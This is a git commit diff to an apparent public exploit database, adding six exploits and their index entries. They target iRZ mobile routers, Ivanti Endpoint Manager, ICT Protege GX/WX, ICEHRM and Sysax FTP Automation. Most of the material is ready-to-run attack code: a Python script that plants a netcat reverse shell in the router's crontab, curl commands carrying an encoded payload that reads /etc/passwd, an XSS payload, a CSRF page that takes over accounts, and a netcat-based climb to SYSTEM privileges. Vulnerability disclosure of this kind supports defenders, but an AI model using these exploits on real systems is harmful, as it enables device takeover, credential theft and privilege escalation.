DB: 2022-03-23
6 changes to exploits/shellcodes Sysax FTP Automation 6.9.0 - Privilege Escalation iRZ Mobile Router - CSRF to RCE Ivanti Endpoint Manager 4.6 - Remote Code Execution (RCE) ICT Protege GX/WX 2.08 - Stored Cross-Site Scripting (XSS) ICT Protege GX/WX 2.08 - Client-Side SHA1 Password Hash Disclosure ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Takeover
This commit is contained in:
parent
62c4c0421c
commit
e55394b7d4
7 changed files with 466 additions and 0 deletions
157
exploits/hardware/remote/50832.py
Executable file
157
exploits/hardware/remote/50832.py
Executable file
|
@ -0,0 +1,157 @@
|
||||||
|
# Exploit Title: iRZ Mobile Router - CSRF to RCE
|
||||||
|
# Google Dork: intitle:"iRZ Mobile Router"
|
||||||
|
# Date: 2022-03-18
|
||||||
|
# Exploit Author: Stephen Chavez & Robert Willis
|
||||||
|
# Vendor Homepage: https://en.irz.ru/
|
||||||
|
# Software Link: https://github.com/SakuraSamuraii/ez-iRZ
|
||||||
|
# Version: Routers through 2022-03-16
|
||||||
|
# Tested on: RU21, RU21w, RL21, RU41, RL01
|
||||||
|
# CVE : CVE-2022-27226
|
||||||
|
|
||||||
|
import os
|
||||||
|
import requests
|
||||||
|
import json
|
||||||
|
import subprocess
|
||||||
|
|
||||||
|
option = "0"
|
||||||
|
|
||||||
|
|
||||||
|
def main():
|
||||||
|
print("####################################################")
|
||||||
|
print("# Welcome to IRZ CSRF to RCE Exploit - version 1.0 #")
|
||||||
|
print("####################################################")
|
||||||
|
print()
|
||||||
|
print("## by RedragonX of WHG & rej_ex of SAKURA SAMURAI ##")
|
||||||
|
print()
|
||||||
|
print("1. Post Authentication RCE (Needs Credentials)")
|
||||||
|
print("2. CSRF to RCE (No Credentials)")
|
||||||
|
print()
|
||||||
|
runit()
|
||||||
|
|
||||||
|
|
||||||
|
def runit():
|
||||||
|
option = input("Select an option: ")
|
||||||
|
if option == "1":
|
||||||
|
exploit1()
|
||||||
|
elif option == "2":
|
||||||
|
exploit2()
|
||||||
|
else:
|
||||||
|
print("You must select '1' or '2'. Exiting.")
|
||||||
|
|
||||||
|
|
||||||
|
def exploit1():
|
||||||
|
print("## Running Post Auth RCE exploit")
|
||||||
|
print()
|
||||||
|
print()
|
||||||
|
router_ip = input("## Enter the router ip to exploit: ")
|
||||||
|
router_port = int(
|
||||||
|
input("## Enter the victim router web page port (default is 80): ") or "80")
|
||||||
|
|
||||||
|
router_user = input("## Enter the username for the router login: ")
|
||||||
|
router_pass = input("## Enter the password for the router login: ")
|
||||||
|
|
||||||
|
LHOST = input("## Enter the LHOST for the router reverse shell: ")
|
||||||
|
LPORT = input("## Enter the LPORT for the router reverse shell: ")
|
||||||
|
|
||||||
|
router_url = f'http://{router_ip}:{router_port}'
|
||||||
|
|
||||||
|
nc1_str = f'Start a listener with the following command: nc -lvp {LPORT}'
|
||||||
|
|
||||||
|
input(nc1_str + "\n\nPress enter once you do")
|
||||||
|
|
||||||
|
send_json_payload(router_url, router_user, router_pass, LHOST, LPORT)
|
||||||
|
|
||||||
|
|
||||||
|
def send_json_payload(router_url, router_user, router_pass, lhost_ip, lhost_port):
|
||||||
|
|
||||||
|
intro = f'Sending the payload to {router_url}\n'
|
||||||
|
print(intro)
|
||||||
|
payload_str = '{"tasks":[{"enable":true,"minutes":"*","hours":"*","days":"*","months":"*","weekdays":"*","command":"rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc ' + \
|
||||||
|
f'{lhost_ip} {lhost_port} ' + \
|
||||||
|
'>/tmp/f"}],"_board":{"name":"RL21","platform":"irz_mt02","time":"Wed Mar 16 16:43:20 UTC 2022"}}'
|
||||||
|
|
||||||
|
payload_json = json.loads(payload_str)
|
||||||
|
|
||||||
|
s = requests.Session()
|
||||||
|
|
||||||
|
s.auth = (router_user, router_pass)
|
||||||
|
|
||||||
|
s.headers.update(
|
||||||
|
{"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"})
|
||||||
|
s.headers.update({"X-Requested-With": "XMLHttpRequest"})
|
||||||
|
s.headers.update({"Origin": router_url})
|
||||||
|
s.headers.update({"Referer": router_url})
|
||||||
|
|
||||||
|
s.post(router_url + "/api/crontab", json=payload_json)
|
||||||
|
|
||||||
|
exploit_str = f'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost_ip} 443 >/tmp/f'
|
||||||
|
|
||||||
|
print(
|
||||||
|
"Request sent! You may have to wait about 2 minutes to get a shell. \nFirst shell will die due to crontab job. Start a new listener on a new port [e.g. 443], and run the following command: " + exploit_str)
|
||||||
|
print("To fix TTY: type telnet 0.0.0.0 in the shell")
|
||||||
|
|
||||||
|
|
||||||
|
def exploit2():
|
||||||
|
|
||||||
|
print("## Running CSRF to RCE exploit")
|
||||||
|
print()
|
||||||
|
print()
|
||||||
|
router_ip = input("## Enter the router ip to exploit: ")
|
||||||
|
router_port = int(
|
||||||
|
input("## Enter the victim router web page port (default is 80): ") or "80")
|
||||||
|
|
||||||
|
LHOST = input("## Enter the LHOST for the router reverse shell: ")
|
||||||
|
LPORT = input("## Enter the LPORT for the router reverse shell: ")
|
||||||
|
|
||||||
|
load_csrf_poc_file(router_ip, router_port, LHOST, LPORT)
|
||||||
|
|
||||||
|
|
||||||
|
def load_csrf_poc_file(router_ip, router_port, lhost_ip, lhost_port):
|
||||||
|
|
||||||
|
file_path = os.path.dirname(__file__) + os.sep + "poc.template.html"
|
||||||
|
|
||||||
|
if os.path.isfile(file_path):
|
||||||
|
with open(file_path) as poc_file:
|
||||||
|
original_poc_data_str = poc_file.read()
|
||||||
|
|
||||||
|
new_html = original_poc_data_str.replace("{router_ip}", router_ip)
|
||||||
|
new_html = new_html.replace(
|
||||||
|
"{router_port}", str(router_port))
|
||||||
|
|
||||||
|
lhost_split_arr = lhost_ip.split(".")
|
||||||
|
|
||||||
|
if len(lhost_split_arr) == 4:
|
||||||
|
|
||||||
|
new_html = new_html.replace(
|
||||||
|
"{lhost_ip_octect_1}", lhost_split_arr[0])
|
||||||
|
|
||||||
|
new_html = new_html.replace(
|
||||||
|
"{lhost_ip_octect_2}", lhost_split_arr[1])
|
||||||
|
|
||||||
|
new_html = new_html.replace(
|
||||||
|
"{lhost_ip_octect_3}", lhost_split_arr[2])
|
||||||
|
new_html = new_html.replace(
|
||||||
|
"{lhost_ip_octect_4}", lhost_split_arr[3])
|
||||||
|
|
||||||
|
new_html = new_html.replace(
|
||||||
|
"{lhost_port}", lhost_port)
|
||||||
|
|
||||||
|
new_file_path = os.path.dirname(
|
||||||
|
__file__) + os.sep + "poc.new.html"
|
||||||
|
try:
|
||||||
|
with open(new_file_path, 'w') as new_file:
|
||||||
|
new_file.write(new_html)
|
||||||
|
|
||||||
|
print()
|
||||||
|
print(
|
||||||
|
f'New file written to {new_file_path}. Host this file')
|
||||||
|
except FileNotFoundError:
|
||||||
|
print("You had an error writing to the file, doesn't exist.")
|
||||||
|
else:
|
||||||
|
print(f'{lhost_ip} is not a proper IPV4 address.')
|
||||||
|
|
||||||
|
else:
|
||||||
|
print(f'{file_path} not found')
|
||||||
|
|
||||||
|
|
||||||
|
main()
|
116
exploits/hardware/remote/50835.txt
Normal file
116
exploits/hardware/remote/50835.txt
Normal file
|
@ -0,0 +1,116 @@
|
||||||
|
# Exploit Title: ICT Protege GX/WX 2.08 - Stored Cross-Site Scripting (XSS)
|
||||||
|
# Exploit Author: LiquidWorm
|
||||||
|
|
||||||
|
Vendor: Integrated Control Technology Ltd.
|
||||||
|
Product web page: https://www.ict.co
|
||||||
|
Affected version: GX: Ver: 2.08.1002 K1B3
|
||||||
|
Lib: 04.00.217
|
||||||
|
Int: 2.3.235.J013
|
||||||
|
OS: 2.0.20
|
||||||
|
WX: Ver: 4.00 284 H062
|
||||||
|
App: 02.08.766
|
||||||
|
Lib: 04.00.169
|
||||||
|
Int: 02.2.208
|
||||||
|
|
||||||
|
Summary: Protege GX is an enterprise level integrated access control, intrusion
|
||||||
|
detection and building automation solution with a feature set that is easy to
|
||||||
|
operate, simple to integrate and effortless to extend. Protege WX is an all-in-one,
|
||||||
|
web-based, cross-platform system that gives you a fully functional access control
|
||||||
|
and intrusion detection solution in a fraction of the time of conventional software.
|
||||||
|
With no software to install, setup is quick and simple. Connect the Controller and
|
||||||
|
system components, then open a web browser to launch the intuitive wizard-driven
|
||||||
|
interface which guides you through the process of configuring your system.
|
||||||
|
|
||||||
|
Desc: The application suffers from an authenticated stored XSS vulnerability.
|
||||||
|
The issue is triggered when input passed to the 'Name' parameter is not properly
|
||||||
|
sanitized before being returned to the user. This can be exploited to execute
|
||||||
|
arbitrary HTML and script code in a user's browser session in context of an
|
||||||
|
affected site.
|
||||||
|
|
||||||
|
Tested on: Microsoft-WinCE/6.00
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
@zeroscience
|
||||||
|
|
||||||
|
|
||||||
|
Advisory ID: ZSL-2022-5699
|
||||||
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5699.php
|
||||||
|
|
||||||
|
|
||||||
|
08.02.2022
|
||||||
|
|
||||||
|
--
|
||||||
|
|
||||||
|
|
||||||
|
UI navigation:
|
||||||
|
--------------
|
||||||
|
|
||||||
|
Scheduling > Daylight Savings > (Name field).
|
||||||
|
|
||||||
|
|
||||||
|
Decrypted POST request:
|
||||||
|
-----------------------
|
||||||
|
|
||||||
|
POST /daylightsaving.htm
|
||||||
|
|
||||||
|
Command&Type=Submit&SubType=GXT_DAYLIGHTSAVINGS_TBL&DaylightSavingId=1&action=update&Name=ZSL%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&StartMonth=10&EndMonth=2&StartDay=41&EndDay=41&RecId=1
|
||||||
|
|
||||||
|
|
||||||
|
Encrypted GET request:
|
||||||
|
----------------------
|
||||||
|
|
||||||
|
http://CONTROLLER_IP/PRT_CTRL_DIN_ISAPI.dll?8F7FFABE947FEE9C78850F2BA679A3B1645F6378696B32385B56303C43604B48F8CD082303AADCFCECEA082384C860AB16159DADCD89C9A7A2A47EE1F49A7A98AC9A8572882F88FAE5409CF6E06E04DA7F7D10AA6D45525C62B2A62FD949FF00E6B6B7471010908D9A59FBA1D9F304AD8CB24E0CE317A0870AA5A5253F0FCD58CA2BC874AC002CB62422E184FB9F13161C9C00E08F258B8519578EA2793A0C28A4AF51CF65637C0C2F972CE3F49703214A63AA78B3EBE5C720DBE1E9C97E772334EC95480956E27DB6D1DF4489C5D60CCE27D69B388CA6C69A9DC72D85127F870DDA4E459CA245508EBFD66D1C83D9FA12838C1F426E538D5D75192B57DF5AF6
|
||||||
|
|
||||||
|
|
||||||
|
Additional info:
|
||||||
|
----------------
|
||||||
|
|
||||||
|
Databse backup predictable name: Db_D3037E8A_8_Feb_22.bak
|
||||||
|
The D3037E8A is the serial number of the onboard reader.
|
||||||
|
|
||||||
|
Encrypt/Decrypt functions:
|
||||||
|
--------------------------
|
||||||
|
|
||||||
|
From console:
|
||||||
|
> localStorage.getItem("WXKey")
|
||||||
|
< '8EDB22D9FB767538'
|
||||||
|
|
||||||
|
function encryptAES(a, c) {
|
||||||
|
a = a.toString();
|
||||||
|
a = unescape(encodeURIComponent(a));
|
||||||
|
"undefined" == typeof c && (c = !0);
|
||||||
|
if (0 == servertype)
|
||||||
|
return a;
|
||||||
|
var b = localStorage.getItem("WXKey");
|
||||||
|
if ("" == b || null == b)
|
||||||
|
return a;
|
||||||
|
for (var d = "", e = 0; 16 > e; e++)
|
||||||
|
d += String.fromCharCode(Math.floor(75 * Math.random() + 48));
|
||||||
|
a = d + mcrypt.Encrypt(addPKCS7(a), d, b, "rijndael-128", "cbc");
|
||||||
|
return a = c ? getCookie("SESSID") + strToHex(a) : strToHex(a)
|
||||||
|
}
|
||||||
|
|
||||||
|
function decryptAES(a) {
|
||||||
|
if (null == a)
|
||||||
|
return "";
|
||||||
|
a = a.toString();
|
||||||
|
if ("<invalid session> < Packet not Init and not encrypted. >" == a)
|
||||||
|
a = 0 == servertype ? "login.php" : "login.htm",
|
||||||
|
window.location = a + "?" + Math.random().toString(16).substring(2, 8).toLowerCase();
|
||||||
|
else if ("<invalid session>" == a.substr(0, 17))
|
||||||
|
a = 0 == servertype ? "login.php?logout" : "login.htm?logout",
|
||||||
|
window.location = a + "?" + Math.random().toString(16).substring(2, 8).toLowerCase();
|
||||||
|
else {
|
||||||
|
if (0 == servertype)
|
||||||
|
return a;
|
||||||
|
var c = localStorage.getItem("WXKey");
|
||||||
|
if ("" == c)
|
||||||
|
return a;
|
||||||
|
a = hexToStr(a);
|
||||||
|
var b = a.substr(0, 16);
|
||||||
|
a = a.substr(16, a.length);
|
||||||
|
a = mcrypt.Decrypt(a, b, c, "rijndael-128", "cbc").replace(/\x00+$/g, "");
|
||||||
|
a = removePKCS7(a);
|
||||||
|
return a = decodeURIComponent(escape(a))
|
||||||
|
}
|
52
exploits/hardware/remote/50836.txt
Normal file
52
exploits/hardware/remote/50836.txt
Normal file
|
@ -0,0 +1,52 @@
|
||||||
|
# Exploit Title: ICT Protege GX/WX 2.08 - Client-Side SHA1 Password Hash Disclosure
|
||||||
|
# Exploit Author: LiquidWorm
|
||||||
|
|
||||||
|
Vendor: Integrated Control Technology Ltd.
|
||||||
|
Product web page: https://www.ict.co
|
||||||
|
Affected version: GX: Ver: 2.08.1002 K1B3
|
||||||
|
Lib: 04.00.217
|
||||||
|
Int: 2.3.235.J013
|
||||||
|
OS: 2.0.20
|
||||||
|
WX: Ver: 4.00 284 H062
|
||||||
|
App: 02.08.766
|
||||||
|
Lib: 04.00.169
|
||||||
|
Int: 02.2.208
|
||||||
|
|
||||||
|
Summary: Protege GX is an enterprise level integrated access control, intrusion
|
||||||
|
detection and building automation solution with a feature set that is easy to
|
||||||
|
operate, simple to integrate and effortless to extend. Protege WX is an all-in-one,
|
||||||
|
web-based, cross-platform system that gives you a fully functional access control
|
||||||
|
and intrusion detection solution in a fraction of the time of conventional software.
|
||||||
|
With no software to install, setup is quick and simple. Connect the Controller and
|
||||||
|
system components, then open a web browser to launch the intuitive wizard-driven
|
||||||
|
interface which guides you through the process of configuring your system.
|
||||||
|
|
||||||
|
Desc: The application is vulnerable to improper access control that allows an
|
||||||
|
authenticated operator to disclose SHA1 password hashes (client-side) of other
|
||||||
|
users/operators.
|
||||||
|
|
||||||
|
Tested on: Microsoft-WinCE/6.00
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
@zeroscience
|
||||||
|
|
||||||
|
|
||||||
|
Advisory ID: ZSL-2022-5700
|
||||||
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5700.php
|
||||||
|
|
||||||
|
|
||||||
|
08.02.2022
|
||||||
|
|
||||||
|
--
|
||||||
|
|
||||||
|
|
||||||
|
Navigate to http://CONTROLLER_IP/operator.htm
|
||||||
|
|
||||||
|
Source:
|
||||||
|
|
||||||
|
<p><label id="OperatorPassword">Password</label><input type="password" id="Password" value="" class="narrow" readonly=""> <input type="button" id="ButtonChangeOperatorPassword" class="narrow" style="float: right; margin-right: 23%; width: auto;" onclick="updatePassword('operator');" data-multiselect="disabled" value="Change Password"></p>
|
||||||
|
...
|
||||||
|
...
|
||||||
|
<input type="hidden" id="pswdsha" value="053e98c13fcbd7df3bf3a220088e19c867dfd4cc">
|
||||||
|
...
|
25
exploits/multiple/remote/50833.txt
Normal file
25
exploits/multiple/remote/50833.txt
Normal file
|
@ -0,0 +1,25 @@
|
||||||
|
# Exploit Title: Ivanti Endpoint Manager 4.6 - Remote Code Execution (RCE)
|
||||||
|
# Date: 20/03/2022
|
||||||
|
# Exploit Author: d7x
|
||||||
|
# Vendor Homepage: https://www.ivanti.com/
|
||||||
|
# Software Link: https://forums.ivanti.com/s/article/Customer-Update-Cloud-Service-Appliance-4-6
|
||||||
|
# Version: CSA 4.6 4.5 - EOF Aug 2021
|
||||||
|
# Tested on: Linux x86_64 # CVE : CVE-2021-44529
|
||||||
|
# CVE : CVE-2021-44529
|
||||||
|
|
||||||
|
###
|
||||||
|
This is the RCE exploit for the following advisory (officially discovered by Jakub Kramarz):
|
||||||
|
https://forums.ivanti.com/s/article/SA-2021-12-02?language=en_US
|
||||||
|
|
||||||
|
Shoutouts to phyr3wall for providing a hint to where the obfuscated code relies
|
||||||
|
|
||||||
|
@d7x_real
|
||||||
|
https://d7x.promiselabs.net
|
||||||
|
https://www.promiselabs.net
|
||||||
|
###
|
||||||
|
|
||||||
|
# cat /etc/passwd
|
||||||
|
curl -i -s -k -X $'GET' -b $'e=ab; exec=c3lzdGVtKCJjYXQgL2V0Yy9wYXNzd2QiKTs=; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d "\n" | grep -zPo '<c123>\K.*?(?=</c123>)'; echo
|
||||||
|
|
||||||
|
# sleep for 10 seconds
|
||||||
|
curl -i -s -k -X $'GET' -b $'e=ab; exec=c2xlZXAoMTApOw==; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d "\n" | grep -zPo '<c123>\K.*?(?=</c123>)'; echo
|
73
exploits/php/webapps/50831.txt
Normal file
73
exploits/php/webapps/50831.txt
Normal file
|
@ -0,0 +1,73 @@
|
||||||
|
# Exploit Title: ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Takeover
|
||||||
|
# Date: 18/03/2022
|
||||||
|
# Exploit Author: Devansh Bordia
|
||||||
|
# Vendor Homepage: https://icehrm.com/
|
||||||
|
# Software Link: https://github.com/gamonoid/icehrm/releases/tag/v31.0.0.OS
|
||||||
|
# Version: 31.0.0.OS
|
||||||
|
#Tested on: Windows 10
|
||||||
|
|
||||||
|
1. About - ICEHRM
|
||||||
|
IceHrm employee management system allows companies to centralize confidential employee information and define access permissions to authorized personnel to ensure that employee information is both secure and accessible.
|
||||||
|
|
||||||
|
2. Description:
|
||||||
|
The application has an update password feature which has a CSRF vulnerability that allows an attacker to change the password of any arbitrary user leading to an account takeover.
|
||||||
|
|
||||||
|
3. Steps To Reproduce:
|
||||||
|
- Create an User name:Gaurav with permission of the Employee using the Admin User of the application and set his password.
|
||||||
|
- Now login into the application using his credentials and navigate to Update Password Feature to change the password.
|
||||||
|
- Intercept the request in Proxy and we can see there is a GET request used to change password and also NO CSRF Token is being used.
|
||||||
|
- Finally using Burpsuite create CSRF POC and save it as exploit.html.
|
||||||
|
- Now change the password in the POC to any password we want.
|
||||||
|
- Finally we open this POC in the same browser session and click on the submit button.
|
||||||
|
- At last when retrying to login into the application we can see that password has been reset for the account leading to account takeover.
|
||||||
|
|
||||||
|
4. Vulnerable Request:
|
||||||
|
|
||||||
|
GET
|
||||||
|
/app/service.php?t=Employee&a=ca&sa=changePassword&mod=modules=employees&req={"current":"Test@123
|
||||||
|
","pwd":"Dummy@123"} HTTP/1.1
|
||||||
|
Host: localhost:8070
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0)
|
||||||
|
Gecko/20100101 Firefox/98.0
|
||||||
|
Accept: application/json, text/plain, */*
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Connection: close
|
||||||
|
Referer:
|
||||||
|
http://localhost:8070/app/?g=modules&n=employees&m=module_Personal_Information
|
||||||
|
Cookie: PHPSESSID=k8d27ve456j0jb56ga885j1vvb
|
||||||
|
Sec-Fetch-Dest: empty
|
||||||
|
Sec-Fetch-Mode: cors
|
||||||
|
Sec-Fetch-Site: same-origin
|
||||||
|
|
||||||
|
5. Exploit POC (exploit.html)
|
||||||
|
|
||||||
|
<html>
|
||||||
|
|
||||||
|
<!-- CSRF PoC - generated by Burp Suite Professional -->
|
||||||
|
|
||||||
|
<body>
|
||||||
|
|
||||||
|
<script>history.pushState('', '', '/')</script>
|
||||||
|
|
||||||
|
<form action="http://localhost:8070/app/service.php">
|
||||||
|
|
||||||
|
<input type="hidden" name="t" value="Employee" />
|
||||||
|
|
||||||
|
<input type="hidden" name="a" value="ca" />
|
||||||
|
|
||||||
|
<input type="hidden" name="sa" value="changePassword" />
|
||||||
|
|
||||||
|
<input type="hidden" name="mod" value="modules=employees" />
|
||||||
|
|
||||||
|
<input type="hidden" name="req"
|
||||||
|
value="{"current":"Test@123","pwd":"Dummy@123"}"
|
||||||
|
/>
|
||||||
|
|
||||||
|
<input type="submit" value="Submit request" />
|
||||||
|
|
||||||
|
</form>
|
||||||
|
|
||||||
|
</body>
|
||||||
|
|
||||||
|
</html>
|
37
exploits/windows/local/50834.txt
Normal file
37
exploits/windows/local/50834.txt
Normal file
|
@ -0,0 +1,37 @@
|
||||||
|
# Exploit Author: bzyo (@bzyo_)
|
||||||
|
# Exploit Title: Sysax FTP Automation 6.9.0 - Privilege Escalation
|
||||||
|
# Date: 03-20-2022
|
||||||
|
# Vulnerable Software: Sysax FTP Automation 6.9.0
|
||||||
|
# Vendor Homepage: https://www.sysax.com/
|
||||||
|
# Version: 6.9.0
|
||||||
|
# Software Link: https://www.sysax.com/download/sysaxauto_setup.msi
|
||||||
|
# Tested on: Windows 10 x64
|
||||||
|
|
||||||
|
# Details:
|
||||||
|
Sysax Scheduler Service runs as Local System. By default the application allows for low privilege users to create/run backup jobs other than themselves. By removing the option to run as current user or another, the task will run as System. A low privilege user could abuse this and escalate their privileges to local system.
|
||||||
|
|
||||||
|
# Prerequisites:
|
||||||
|
To successfully exploit this vulnerability, an attacker must already have local access to a system running Sysax FTP Automation using a low privileged user account
|
||||||
|
|
||||||
|
# Exploit:
|
||||||
|
Logged in as low privileged account
|
||||||
|
|
||||||
|
1. Create folder c:\temp
|
||||||
|
2. Download netcat (nc.exe) to c:\temp
|
||||||
|
3. Create file 'pwn.bat' in c:\temp with contents
|
||||||
|
c:\temp\nc.exe localhost 1337 -e cmd
|
||||||
|
4. Open command prompt and netcat listener
|
||||||
|
nc -nlvvp 1337
|
||||||
|
5. Open sysaxschedscp.exe from C:\Program Files (x86)\SysaxAutomation
|
||||||
|
6. Select Setup Scheduled/Triggered Tasks
|
||||||
|
- Add task (Triggered)
|
||||||
|
- Update folder to monitor to be c:\temp
|
||||||
|
- Check 'Run task if a file is added to the monitor folder or subfolder(s)'
|
||||||
|
- Choose 'Run any other Program' and choose c:\temp\pwn.bat
|
||||||
|
- Uncheck 'Login as the following user to run task'
|
||||||
|
- Finish and Save
|
||||||
|
7. Create new text file in c:\temp
|
||||||
|
8. Check netcat listener
|
||||||
|
C:\WINDOWS\system32>whoami
|
||||||
|
whoami
|
||||||
|
nt authority\system
|
|
@ -11472,6 +11472,7 @@ id,file,description,date,author,type,platform,port
|
||||||
50818,exploits/windows/local/50818.txt,"WOW21 5.0.1.9 - 'Service WOW21_Service' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows,
|
50818,exploits/windows/local/50818.txt,"WOW21 5.0.1.9 - 'Service WOW21_Service' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows,
|
||||||
50819,exploits/windows/local/50819.txt,"Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows,
|
50819,exploits/windows/local/50819.txt,"Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows,
|
||||||
50824,exploits/windows/local/50824.txt,"VIVE Runtime Service - 'ViveAgentService' Unquoted Service Path",1970-01-01,"Faisal Alasmari",local,windows,
|
50824,exploits/windows/local/50824.txt,"VIVE Runtime Service - 'ViveAgentService' Unquoted Service Path",1970-01-01,"Faisal Alasmari",local,windows,
|
||||||
|
50834,exploits/windows/local/50834.txt,"Sysax FTP Automation 6.9.0 - Privilege Escalation",1970-01-01,bzyo,local,windows,
|
||||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
|
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
|
||||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
|
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
|
||||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
|
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
|
||||||
|
@ -18650,6 +18651,10 @@ id,file,description,date,author,type,platform,port
|
||||||
50821,exploits/hardware/remote/50821.py,"Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)",1970-01-01,"Aryan Chehreghani",remote,hardware,
|
50821,exploits/hardware/remote/50821.py,"Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)",1970-01-01,"Aryan Chehreghani",remote,hardware,
|
||||||
50822,exploits/multiple/remote/50822.txt,"Tdarr 2.00.15 - Command Injection",1970-01-01,"Sam Smith",remote,multiple,
|
50822,exploits/multiple/remote/50822.txt,"Tdarr 2.00.15 - Command Injection",1970-01-01,"Sam Smith",remote,multiple,
|
||||||
50829,exploits/multiple/remote/50829.py,"Apache APISIX 2.12.1 - Remote Code Execution (RCE)",1970-01-01,Ven3xy,remote,multiple,
|
50829,exploits/multiple/remote/50829.py,"Apache APISIX 2.12.1 - Remote Code Execution (RCE)",1970-01-01,Ven3xy,remote,multiple,
|
||||||
|
50832,exploits/hardware/remote/50832.py,"iRZ Mobile Router - CSRF to RCE",1970-01-01,"John Jackson",remote,hardware,
|
||||||
|
50833,exploits/multiple/remote/50833.txt,"Ivanti Endpoint Manager 4.6 - Remote Code Execution (RCE)",1970-01-01,d7x,remote,multiple,
|
||||||
|
50835,exploits/hardware/remote/50835.txt,"ICT Protege GX/WX 2.08 - Stored Cross-Site Scripting (XSS)",1970-01-01,LiquidWorm,remote,hardware,
|
||||||
|
50836,exploits/hardware/remote/50836.txt,"ICT Protege GX/WX 2.08 - Client-Side SHA1 Password Hash Disclosure",1970-01-01,LiquidWorm,remote,hardware,
|
||||||
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
|
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
|
||||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
|
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
|
||||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
|
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
|
||||||
|
@ -44896,5 +44901,6 @@ id,file,description,date,author,type,platform,port
|
||||||
50823,exploits/multiple/webapps/50823.txt,"Baixar GLPI Project 9.4.6 - SQLi",1970-01-01,"Prof. Joas Antonio",webapps,multiple,
|
50823,exploits/multiple/webapps/50823.txt,"Baixar GLPI Project 9.4.6 - SQLi",1970-01-01,"Prof. Joas Antonio",webapps,multiple,
|
||||||
50825,exploits/php/webapps/50825.py,"Moodle 3.11.5 - SQLi (Authenticated)",1970-01-01,"Chris Anastasio",webapps,php,
|
50825,exploits/php/webapps/50825.py,"Moodle 3.11.5 - SQLi (Authenticated)",1970-01-01,"Chris Anastasio",webapps,php,
|
||||||
50826,exploits/php/webapps/50826.py,"Pluck CMS 4.7.16 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Ashish Koli",webapps,php,
|
50826,exploits/php/webapps/50826.py,"Pluck CMS 4.7.16 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Ashish Koli",webapps,php,
|
||||||
|
50831,exploits/php/webapps/50831.txt,"ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Takeover",1970-01-01,"Devansh Bordia",webapps,php,
|
||||||
50828,exploits/php/webapps/50828.sh,"Tiny File Manager 2.4.6 - Remote Code Execution (RCE)",1970-01-01,"FEBIN MON SAJI",webapps,php,
|
50828,exploits/php/webapps/50828.sh,"Tiny File Manager 2.4.6 - Remote Code Execution (RCE)",1970-01-01,"FEBIN MON SAJI",webapps,php,
|
||||||
50830,exploits/php/webapps/50830.txt,"Wordpress Plugin iQ Block Country 1.2.13 - Arbitrary File Deletion via Zip Slip (Authenticated)",1970-01-01,"Ceylan BOZOĞULLARINDAN",webapps,php,
|
50830,exploits/php/webapps/50830.txt,"Wordpress Plugin iQ Block Country 1.2.13 - Arbitrary File Deletion via Zip Slip (Authenticated)",1970-01-01,"Ceylan BOZOĞULLARINDAN",webapps,php,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue